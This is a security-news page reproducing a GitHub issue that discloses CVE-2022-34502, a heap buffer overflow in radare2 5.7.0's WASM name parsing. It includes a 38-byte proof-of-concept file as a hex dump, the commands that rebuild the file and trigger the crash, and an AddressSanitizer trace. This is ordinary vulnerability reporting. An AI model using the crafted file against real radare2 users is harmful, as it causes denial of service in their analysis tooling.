Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-34502: heap-buffer-overflow in WASM name handling after 5.7.0 release · Issue #20336 · radareorg/radare2

Radare2 v5.7.0 was discovered to contain a heap buffer overflow via the function consume_encoded_name_new at format/wasm/wasm.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted binary file.

CVE
#vulnerability#ubuntu#linux#dos#git#buffer_overflow

Environment

Mon Jun 20 03:01:00 PM CST 2022 radare2 5.7.0 28296 @ linux-x86-64 git.5.7.0 commit: 09569c1d5c324df7f23bdc9ad864ac1c25925745 build: 2022-06-20__11:48:07 Linux x86_64

Description

After 5.7.0 release, a heap buffer overflow can be found in function consume_encoded_name_new in format/wasm/wasm.c via openning a crafted binary file with r2.

Test

  1. Build Radare2 with AddressSanitizer enabled. (Just execute ./sys/sanitize.sh)

  2. Make a PoC file with size of just 38 bytes. Save the content below as hex.txt

    00000000: 0061 736d 7f00 0000 0001 0dff 7436 ff8b .asm…t6… 00000010: 3000 3e01 499f 1000 fc00 7f45 4c46 80ff 0.>.I…ELF… 00000020: fe61 73ff 0240 .as…@

xxd -r hex.txt > PoCfile to create the poc file
3. r2 PoCfile

==1862034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000156b8 at pc 0x7fd01225622c bp 0x7ffc007f6a20 sp 0x7ffc007f6a10
WRITE of size 1 at 0x6060000156b8 thread T0
    #0 0x7fd01225622b in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:147
    #1 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955
    #2 0x7fd01225b053 in r_bin_wasm_init /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:872
    #3 0x7fd0122501e2 in load_buffer /home/ubuntu/radare2/libr/..//libr/bin/p/bin_wasm.c:29
    #4 0x7fd011e1352c in r_bin_object_new /home/ubuntu/radare2/libr/bin/bobj.c:149
    #5 0x7fd011e08513 in r_bin_file_new_from_buffer /home/ubuntu/radare2/libr/bin/bfile.c:592
    #6 0x7fd011dc5baa in r_bin_open_buf /home/ubuntu/radare2/libr/bin/bin.c:285
    #7 0x7fd011dc6996 in r_bin_open_io /home/ubuntu/radare2/libr/bin/bin.c:345
    #8 0x7fd0142a6b57 in r_core_file_do_load_for_io_plugin /home/ubuntu/radare2/libr/core/cfile.c:436
    #9 0x7fd0142a96fb in r_core_bin_load /home/ubuntu/radare2/libr/core/cfile.c:637
    #10 0x7fd019bb1d8f in r_main_radare2 /home/ubuntu/radare2/libr/main/radare2.c:1256
    #11 0x5557ff52696e in main /home/ubuntu/radare2/binr/radare2/radare2.c:104
    #12 0x7fd018faf082 in __libc_start_main ../csu/libc-start.c:308
    #13 0x5557ff52630d in _start (/home/ubuntu/radare2/binr/radare2/radare2+0x230d)

0x6060000156b8 is located 2 bytes to the right of 54-byte region [0x606000015680,0x6060000156b6)
allocated by thread T0 here:
    #0 0x7fd01ad24808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x7fd0122552f4 in consume_encoded_name_new /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:133
    #2 0x7fd01225c4da in r_bin_wasm_get_sections /home/ubuntu/radare2/libr/..//libr/bin/p/../format/wasm/wasm.c:955

The vulnerable code is introduced in b0129d7#diff-4d372afc1ec76c51b9f2f402ae1b543c699030475eb192b8d49ec8dd47f04b0cR132-R147

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907